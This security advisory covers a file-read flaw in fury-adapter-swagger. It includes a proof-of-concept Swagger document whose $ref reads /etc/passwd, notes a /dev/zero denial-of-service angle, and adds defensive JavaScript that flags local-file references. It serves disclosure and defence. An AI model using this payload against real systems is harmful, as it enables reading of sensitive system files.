fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker who supplies a crafted Swagger document to read arbitrary files from the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
A Swagger 2.0 document that triggers the file read:

```yaml
---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'
paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'
```
Upgrade to version 0.9.7 or later.
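A consumer-side check, added here as example code that is not part of fury-adapter-swagger, that walks a parsed Swagger document and reports every `$ref` a resolver would read from the local filesystem (bare paths, `file:` URLs) so the document can be refused before any reference is resolved; the names `isSafeRef`, `findUnsafeRefs` and `validateSwaggerRefs`, the origin allowlist, and the embedded copy of the advisory's example document are all assumptions.

```javascript
// Only in-document JSON pointers ("#/...") are safe by default. http(s) refs
// are accepted only for allow-listed origins, since a resolver that fetches
// arbitrary URLs turns a file-read bug into a server-side request issue.
// Bare paths ("/etc/passwd", "../x"), file: URLs and anything else are unsafe.
function isSafeRef(ref, allowedOrigins = []) {
  if (typeof ref !== 'string') return false;
  if (ref.startsWith('#')) return true;
  let url;
  try { url = new URL(ref); } catch (e) { return false; } // bare path, not a URL
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return allowedOrigins.includes(url.origin);
}

// Escape a key per RFC 6901 so the reported location is a valid JSON pointer.
const escapeToken = (key) => key.replace(/~/g, '~0').replace(/\//g, '~1');

// Walks a parsed Swagger object and collects every unsafe $ref together with
// the JSON pointer of the object that contains it.
function findUnsafeRefs(node, allowedOrigins = [], path = '') {
  const found = [];
  if (node === null || typeof node !== 'object') return found;
  const entries = Array.isArray(node)
    ? node.map((v, i) => [String(i), v])
    : Object.entries(node);
  for (const [key, value] of entries) {
    if (key === '$ref' && !isSafeRef(value, allowedOrigins)) {
      found.push({ pointer: path, ref: value });
    }
    found.push(...findUnsafeRefs(value, allowedOrigins, `${path}/${escapeToken(key)}`));
  }
  return found;
}

// Gate to call before handing the document to any resolver (hypothetical hook).
function validateSwaggerRefs(doc, allowedOrigins = []) {
  const unsafe = findUnsafeRefs(doc, allowedOrigins);
  return { ok: unsafe.length === 0, unsafe };
}

// Constructed input: the advisory's proof-of-concept document as a JS object.
const advisoryDoc = {
  swagger: '2.0',
  info: { title: 'Read local files', version: '1.0' },
  paths: { '/foo': { get: { responses: { 200: {
    description: 'Some description',
    examples: { 'text/html': { example: { $ref: '/etc/passwd' } } },
  } } } } },
};

console.log(JSON.stringify(validateSwaggerRefs(advisoryDoc), null, 2));
```

For the advisory's document the check reports one unsafe reference at `/paths/~1foo/get/responses/200/examples/text~1html/example`; a document using only `#/definitions/...` pointers passes.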
Severity: HIGH. Weakness type: CWE-22. Reviewed by GitHub on 2020-08-31; no NVD publication date recorded.